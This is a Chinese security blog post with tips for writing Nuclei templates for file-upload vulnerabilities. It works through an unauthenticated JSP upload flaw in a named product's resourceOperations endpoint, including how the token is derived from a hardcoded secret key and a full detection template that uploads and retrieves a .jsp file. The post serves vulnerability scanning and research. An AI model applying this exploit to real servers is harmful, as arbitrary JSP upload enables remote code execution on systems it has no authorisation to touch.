Nuclei文件上传小Tips

admin
admin
admin
138691
文章
114
评论
2024年8月18日01:36:11评论61 views字数 1908阅读6分21秒阅读模式
本文由掌控安全学院 -

 不知江月待何人

 投稿

Track安全社区投稿~  

千元稿费!还有保底奖励~(https://bbs.zkaq.cn)

前言

Nuclei对于文件上传类型Poc编写小Tips

Nuclei文件上传小Tips

平台

ProjectDiscovery Cloud Platform:
https://cloud.projectdiscovery.io/
JsonPath:
https://jsonpath.com/
Json解析:
在线json解析平台即可

案例

某康resourceOperations upload接口存在前台上传
具体接口:
POST /eps/api/resourceOperations/upload?token=xxx HTTP/1.1

分析

token为 32位MD5大写,即
MD5(https://target.com/eps/api/resourceOperations/uploadsecretKeyIbuilding)转大写

Resp返回path如下:

{"success":true,"message":"上传附件成功","data":{"uuid":null,"resourceUuid":"9abf316d58xxxxx25460b9358c91","resourceType":9998,"operationType":999,"extAttrs":"{"fileName":"1.jsp","fileSize":"0.00KB"}","pUuid":null,"isOn":null,"resourceName":"1.jsp","resourceSize":"0.00KB","unitName":null,"regionName":null}}

完整path:https://target.com/eps/upload/resourceUuid值.jsp

Nuclei for Poc

variables:
    boundary: "{{rand_base(20)}}"
    Token: '{{to_upper("{{md5("https://{{Hostname}}/eps/api/resourceOperations/uploadsecretKeyIbuilding")}}")}}'

path提取

Nuclei文件上传小Tips

demo:

http:
  - raw:
      - |-
        POST /eps/api/resourceOperations/upload?token={{Token}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Connection: close
        Cookie: ISMS_8700_Sessionname=A29E70BEA1FDA82E2CF0805C3A389988
        Content-Type: multipart/form-data;boundary={{boundary}}
        Upgrade-Insecure-Requests: 1
        Content-Length: 174

        --{{boundary}}
        Content-Disposition: form-data; name="fileUploader";filename="1.jsp"
        Content-Type: image/jpeg

        123456
        --{{boundary}}
      - |-
        GET /eps/upload/{{plt}}.jsp HTTP/1.1
        Host: {{Hostname}}
    extractors:
      - type: json
        part: body
        name: plt
        internal: true
        json: 
          - '.data.resourceUuid'

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains_all(body_2,"123456") && status_code==200
申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

Nuclei文件上传小Tips

 

原文始发于微信公众号(掌控安全EDU):Nuclei文件上传小Tips

 





							

						
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
	
				
				

	
    
		
  • 
			左青龙
		
    • 
		
  • 微信扫一扫
    • 
		
  • 
			weinxin
		
    • 
	

	
    
		
  • 
			右白虎
		
    • 
		
  • 微信扫一扫
    • 
		
  • 
			weinxin
		
    • 
	

	



	
	

		

				

	


	




								

			
		

	
									

					admin				
    
											
  • 本文由  发表于 2024年8月18日01:36:11
    • 
						
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  
Nuclei文件上传小Tipshttps://cn-sec.com/archives/3074171.html

                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

    • 
			

	



				
				

				
										

				
				

	

			

	




				
				

			



	


				




	
	
			

		

							

											

														

																	
发表评论

																匿名网友
								填写信息